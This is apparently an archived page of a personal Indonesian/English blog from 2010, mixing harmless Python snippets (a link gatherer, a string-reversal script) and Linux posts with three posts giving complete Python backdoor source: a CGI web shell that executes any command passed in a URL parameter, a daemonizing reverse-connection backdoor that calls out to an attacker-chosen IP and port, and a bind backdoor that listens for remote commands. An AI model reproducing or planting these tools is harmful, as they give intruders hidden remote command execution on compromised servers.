16 Nov

Pindah..!! :D

Posted by otoy in Info.

Mulai dari sekarang blog ini pindah rumah ke: http://www.digital-echidna.org/

thanx buat yang biasa mengunjungi blog ini.

GODspeed

 

16 Oct

Geany: a Kate-like Editor in Gnome

Posted by otoy in Linux, Ubuntu.

After looking for a kate-like editor for gnome, i found geany… :D, it’s a kate -like editor.. and this is what i need, an editor with integrated shell and file browser, if you don’t know about geany and search for kate-like editor in your gnome, i sugest you to try geany.

list of text editors

14 Oct

CGI Backdoor for Linux with Python

Posted by otoy in Code, Hacking, Python, Security Tools. 

#!/usr/bin/env python
# Info  : Linux based CGI backdoor with python
# author: otoy
# date  : 0x102010

import cgi,os,re,sys

form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)

dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]

osinf = os.uname()
info='''====================================
       CGI python backdoor
====================================
Author : otoy
Date   : 0x102010
Blog   : <a href="https://otoyrood.wordpress.com" target="_blak">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

print "Content-type: text/html"
print

print"""
<html>
  <head>
    <title>CGI python backdoor</title>
  </head>
  <body>
    <pre>%s</pre>
    <form action='%s'>
       Command <input type='text' name='cmd' />
    <input type='submit' />
    </form>
    <pre>%s</pre>
  </body>
</html>
""" %(info,progfl,osexe.read())

in action :

PS: if you wanna try this code in your closed environment, you can read this link or this one, it will show you how to run CGI module on your apache server.

13 Oct

web links gatherer (ver 2)

Posted by otoy in Code, Python.

By using Beautiful Soup, we can change the code as seen at the previous post to the code below…  and it even works much better… just by changing the regex function, it return a better result :

#!/usr/bin/python
# otoy -- https://otoyrood.wordpress.com
# 0x102010

from urllib import urlopen
from BeautifulSoup import BeautifulSoup

text = urlopen('https://otoyrood.wordpress.com').read()
soup = BeautifulSoup(text)

pages = set()
for header in soup('a'):
 pages.add(header['href'])

print '\n'.join(sorted(pages))

13 Oct

web links gatherer dengan python

Posted by otoy in Code, Python.

program sederhana ini digunakan untuk mengumpulkan link-link yang ada pada sebuah halaman web, bisa juga di kembangkan menjadi sebuah crawler.. 😀

#!/usr/bin/python
#info: program untuk mendapatkan info link-link
#      yang terdapat dalam sebuah halaman web
#
# otoy(https://otoyrood.wordpress.com)
# 0x102010

from urllib import urlopen
import re,sys

peng = '''Penggunaan: python %s http://<alamat web> (jangan lupa http:// atau https://)
Contoh    : python %s https://otoyrood.wordpress.com''' %(sys.argv[0],sys.argv[0])

def main():
 if len(sys.argv) <=1:
 print peng
 sys.exit(1)
 urls=set()

 pat = re.compile('href="([http:|https:].*?)"')

 try:
 urlscn = urlopen(sys.argv[1]).read()
 except IOError:
 print peng
 sys.exit(1)
 print "[+]Gathering links from the web"

 for url in pat.findall(urlscn):
 urls.add(url)

fl = open("haslscan.txt","w")

for url in sorted(urls):
 hsl = '%s' % url,"\n"
 fl.writelines(hsl)

 fl.close()
 print "[+]Gathering links done"

if __name__ == "__main__" :
 main()

in action:

the result:

12 Oct

Bermain string dengan python

Posted by otoy in Code, Python. 

#!/usr/bin/python

import sys

pgun='''penggunaan: %s <kalimat>
contoh: python %s saya pusing'''%(sys.argv[0],sys.argv[0])

def main():
args = sys.argv[1:]
if len(sys.argv) <= 1:
print pgun
sys.exit(1)

 #reverse kata (dalam bentuk list)
 args.reverse()

 #tampilkan kata yang sudah di reverse (dalam bentuk list)
 print "Hasil Reverse kalimat:\n======================="
 print args,"\n"

 #join isi list dan tampilkan
 print "Hasil Join kalimat:\n======================="
 teks = ' '.join(args)
 print teks,"\n"

 #reverse perhuruf dan tampilkan
 print "Hasil Reverse perhuruf:\n======================="
 print ''.join(reversed(teks))

if __name__ == '__main__':
 main()

in action:

12 Oct

msfgui new look

Posted by otoy in Hacking, Metasploit, Security Tools.

i’m not usually use msfgui when i’m dealing with metasploit, but… it caught my attention when i’m updating my metasploit, it took a looooong time to download the msfgui, so…. i check it out, i’m quite surprise with the new look, it’s a java based gui.

here some screenshots that i took :

in action:

12 Oct

Ubuntu 10.10 (Maverick Meerkat)

Posted by otoy in Linux, Ubuntu.

Buat yang belum mendownload & mencoba ubuntu versi terbaru ini, bisa melihat beberapa skrinsut berikut :

11 Oct

Reverse Connection Backdoor for Linux

Posted by otoy in Code, Hacking, Python, Security, Security Tools. 

#!/usr/bin/python
#Info   : This is a linux based reverse connection backdoor and
#         this is NOT an interactive Shell!
#Author : otoy
#Date   : 0x102010
#Blog   : otoyrood.wordpress.com

import socket,sys,os,re

#define
osinf = os.uname()
info='''====================================
 py_backdoor
====================================
Author : otoy
Date   : 0x102010
Blog   : otoyrood.wordpress.com
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

def daemonize():
 pid = os.fork()
 if(pid != 0):
 os._exit(0)

def main():
 if len(sys.argv) <= 2:
 print "Usage:",sys.argv[0],"<ip> <port>"
 sys.exit(1)
 UID = os.getlogin()
 CWD = os.getcwd()
 STM = os.uname()
 if UID == 'root':
 SIGN = ' # '
 else:
 SIGN = ' $ '
 ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
 ip = sys.argv[1]
 port = int(sys.argv[2])
 try:
 ls.connect((ip, port))
 except(socket.error):
 print '\n[-]ERROR: Connection Failed!'
 sys.exit(1)
 ls.send(info)
 try:
 while (1):
 bdsh = UID+'@'+STM[1]+':'+CWD+SIGN
 ls.send(bdsh)
 pktcmd = ls.recv(1024)
 rcmd = pktcmd.strip()
 cdir = re.findall('cd (.*)',rcmd)
 try:
 os.chdir(cdir[0])
 CWD = os.getcwd()
except OSError:
 ls.send('No such file or directory: '+cdir[0])
 except IndexError:
 pass
 if rcmd  == 'quit':
 ls.close()
 sys.exit(1)
 elif rcmd == '':
 rcmd = 'echo " "'
 lcmd = os.popen(rcmd)
 cmdstr = lcmd.read().strip()
 ls.send(cmdstr+'\n')
 except(socket.error):
 ls.close()
 sys.exit(1)

if __name__ == '__main__':
 try:
 daemonize()
 main()
 except(KeyboardInterrupt):
 sys.exit(1)

in action:

10 Oct

Bind Backdoor for Linux

Posted by otoy in Code, Hacking, Python, Security, Security Tools. 

#!/usr/bin/python
#Info   : This is a linux based bind backdoor and
#         this is NOT an interactive Shell!
#Author : otoy
#Date   : 0x102010
#Blog   : otoyrood.wordpress.com

import socket,sys,os,re

def daemonize():
 pid = os.fork()
 if(pid != 0):
 os._exit(0)

def main():
 if len(sys.argv) < 2:
print "Usage:",sys.argv[0],"<port>"
sys.exit(1)
 UID = os.getlogin()
 CWD = os.getcwd()
 STM = os.uname()
 if UID == 'root':
SIGN = ' # '
 else:
SIGN = ' $ '
 ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
 port = int(sys.argv[1])
 ls.bind(('', port))
 ls.listen(1)
 (conn, addr) = ls.accept()
 try:
while (1):
bdsh = UID+'@'+STM[1]+':'+CWD+SIGN
conn.send(bdsh)
pktcmd = conn.recv(1024)
rcmd = pktcmd.strip()
cdir = re.findall('cd (.*)',rcmd)
try:
os.chdir(cdir[0])
CWD = os.getcwd()
except OSError:
 conn.send('No such file or directory: '+cdir[0])
except IndexError:
pass
if rcmd  == 'quit':
conn.close()
sys.exit(1)
elif rcmd == '':
rcmd = 'echo " "'
lcmd = os.popen(rcmd)
cmdstr = lcmd.read().strip()
conn.send(cmdstr+'\n')
except(socket.error):
conn.close()
sys.exit(1)

if __name__ == '__main__':
 try:
daemonize()
main()
 except(KeyboardInterrupt):
sys.exit(1)

in action:

« Older Entries